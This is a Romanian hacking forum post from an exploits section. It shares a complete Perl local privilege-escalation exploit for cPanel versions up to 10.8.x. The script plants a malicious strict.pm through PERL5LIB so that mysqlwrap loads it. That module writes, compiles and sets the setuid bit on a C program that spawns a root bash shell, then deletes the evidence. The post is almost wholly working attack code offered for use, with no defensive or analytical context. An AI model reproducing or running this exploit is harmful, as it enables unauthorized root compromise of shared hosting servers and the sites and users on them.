cPanel 10 8 x cpwrap root exploit via mysqladmin

Hacking and more...
HaCkinG CulT

Lista Forumurilor Pe Tematici

Hacking and more... | Reguli | Inregistrare | Login

POZE HACKING AND MORE...

Nu sunteti logat.

Nou pe simpatie:
Kalifa din Ialomita

Femeie
19 ani
Ialomita
cauta Barbat
19 - 32 ani

Hacking and more... / Exploituri si POCs / cPanel <= 10.8.x cpwrap root exploit via mysqladmin

Moderat de Shocker

Autor

Mesaj

Pagini: 1

big chuck
A firewall

Din: Inside the band
Inregistrat: acum 17 ani
Postari: 589

Code:

#!/usr/bin/perl -w

# 10/01/06 - cPanel <= 10.8.x cpwrap root exploit via mysqladmin
# use strict; # haha oh wait..

my $cpwrap       = "/usr/local/cpanel/bin/cpwrap";
my $mysqlwrap    = "/usr/local/cpanel/bin/mysqlwrap";
my $pwd          = `pwd`;

chomp $pwd;
$ENV{'PERL5LIB'} = "$pwd";

if ( ! -x "/usr/bin/gcc" )  { die "gcc: $!n"; }
if ( ! -x "$cpwrap" )       { die "$cpwrap: $!n"; }
if ( ! -x "$mysqlwrap" )    { die "$mysqlwrap: $!n"; }

open  (CPWRAP, "<$cpwrap") or die "Could not open $cpwrap: $!n";
while(<CPWRAP>) {
   if(/REMOTE_USER/) { die "$cpwrap is patched.n"; }
}
close (CPWRAP);

open  (STRICT, ">strict.pm") or die "Can't open strict.pm: $!n";
print  STRICT  "$e  = "int main(){setreuid(0,0);setregid(0,0);system(\\\"/bin/bash\\\");}";n";
print  STRICT  "system("/bin/echo -n \"$e\">Maildir.c");n";
print  STRICT  "system("/usr/bin/gcc Maildir.c -o Maildir");n";
print  STRICT  "system("/bin/chmod 4755 Maildir");n";
print  STRICT  "system("/bin/rm -f Maildir.c strict.pm");n";
close (STRICT);

system("$mysqlwrap DUMPMYSQL 2>/dev/null");

if ( -e "Maildir" ) {
   system("./Maildir");
}
else {
   unlink "strict.pm";
   die "Failedn";
}

_______________________________________
The answer is not in the box,the answer is in the band

pus acum 17 ani

Pagini: 1

Mergi la